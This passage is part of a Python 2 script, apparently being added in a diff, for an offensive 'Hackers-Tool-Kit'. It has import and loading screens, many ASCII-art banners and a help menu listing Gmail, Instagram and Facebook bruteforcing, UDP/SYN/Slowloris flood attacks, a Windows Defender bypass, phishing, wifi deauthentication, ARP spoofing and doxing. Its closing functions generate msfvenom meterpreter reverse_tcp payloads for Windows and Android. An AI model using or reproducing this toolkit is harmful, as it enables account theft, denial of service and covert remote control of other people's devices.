hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """ + type ? for help +\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + type ? for help + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + + type ? for help + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[91m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + type ? for help + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner8(): + print """ + type ? for help\033[91m + +@@@ /$$ /$$ @@@ +@@@ | $$ | $$ @@@ +@@! | $$ | $$ @@! +!@! | $$$$$$$$ !@! +!!@ | $$__ $$ !!@ +!!! | $$ | $$ !!! +!!: | $$ | $$ !!: +:!: |__/ |__/ :!: +@@@ @@@\033[94m +@@@ @@@ +@@! @@! +!@! /$$$$$$$$ !@! +!!@ |__ $$__/ !!@ +!!! | $$ !!! +!!: | $$ !!: +:!:---------------| $$---------------:!: +@@@ | $$ @@@ +@@@ | $$ @@@ +@@! |__/ @@! +!@! !@!\033[91m +!!@ !!@ +!!! /$$ /$$ !!! +!!: | $$ /$$/ !!: +:!: | $$ /$$/ :!: +@@@ | $$$$$/ @@@ +@@@ | $$ $$ @@@ +@@! | $$\ $$ @@! +!@! | $$ \ $$ !@! +!!@ |__/ \__/ !!@ +!!! !!! +!!: !!: +:!: :!:\033[92m + :: :: +: @tuf_unkn0wn :\033[0m +""" +def mainbanner9(): + print """ +\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ +║ ║ +\033[33m║ ║ +║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ +\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ +║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ +\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ +║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ +\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ +║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ +\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ +║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ +\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ +║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ +\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ +║\033[0m █ ▐ ▀ █ ▐ \033[95m║ +\033[35m║\033[0m ▐ ▐ \033[35m║ +║ ║\033[1;31m +╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m + type ? for help + """.decode('utf-8') + +def mainbanner10(): + print """\033[0m + ░░░▓█▒░▒▒▒▓▓░ + ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ + ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ + ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ + ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ + ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ + ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ + ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ + ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ + ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ + ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ + ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ + ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ + ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ + ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ + ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ + ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ + ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ + ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ + ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ + ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ + ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ + ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ + ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ + ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ + ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ + ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ + ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ + ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ + ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ + ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ + ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ + ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ + ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ + ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ + ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ + ░█▓▓▓▓▓▓███████▓██▓██░ + ░██▓▓▓████████████████░░░ + ░▓▓▓▓▓███████▓█▓████████░ ░░░ + ░░░█▓█████████████████████████▓▓▓▒░░░░░░ + ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ + ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ + ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ + ░░▓█▓█▓█████████████████████████████░░ + \033[0m""".decode('utf-8') +def mainbanner11(): + print """\033[91m + ██████╗ ██████╗ ██████╗ + ██╔════╝ ██╔════╝ ██╔════╝ + ███████╗ ███████╗ ███████╗ + ██╔═══██╗██╔═══██╗██╔═══██╗ + ╚██████╔╝╚██████╔╝╚██████╔╝ + ╚═════╝ ╚═════╝ ╚═════╝ + ░░░░ ░░░░░ + ░▒███████▓▒░░ ░░░████████▓░░░ + ░▓████████████▒░░ ░░█████████████░░ + ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ + ░ ░██████▒░ ░░░░███████ ░░ + ░░███████░░ ░░██████▓░ + ░███████░░ ░▒██████▒ + ░░░░ ░░███████░░░███████▒░ ░░░ + ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ + ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ + ░▒██████████████▒████████▒██████████████░░ + ░░██████████████▒░███▒▒▒█████████████░░ + ░░░░▓████████░█░▓▓▒████████▒░░░░░ + ░░████████▓░██░████████▒░░░ + ░░▒██████░▒▒░░▒░░██████░ + ░░█████████▓░█░████▓███▓░ + ░▒█▓░▒██████▒███████░░█▓░ + ░░░███████████████████▓░░ + ░▒▓████████████████▒░ + ░░▒███████████████▓▒░ + ░▒█████▓██████░░ + ░██████████░ + @tuf_unkn0wn ░█████████▒ type ? for help + █████████░░ + ░░████████░░ + ░▓█████▓░ + ░▓████▒░ + ░░████░ + ░░░▒██░░ + ░█▓░ + ░░▓░░ + ░░░░░ + ░░ + \033[0m""".decode('utf-8') +def mainbanner12(): + print """\033[91m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner13(): + print """\033[92m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner14(): + print """\033[34m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') + + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,14) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() + if num == 9: + mainbanner9() + if num == 10: + mainbanner10() + if num == 11: + mainbanner11() + if num == 12: + mainbanner12() + if num == 13: + mainbanner13() + if num == 14: + mainbanner14() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +clear : clears screen except for banner +clearall: clears everything on screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +phpload : make a php reverse_tcp payload and start it in a multi handler +pyload : make a python reverse_tcp payload and start it in a multi handler +foxhis : gather firefox history from privileged javascript shell +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + 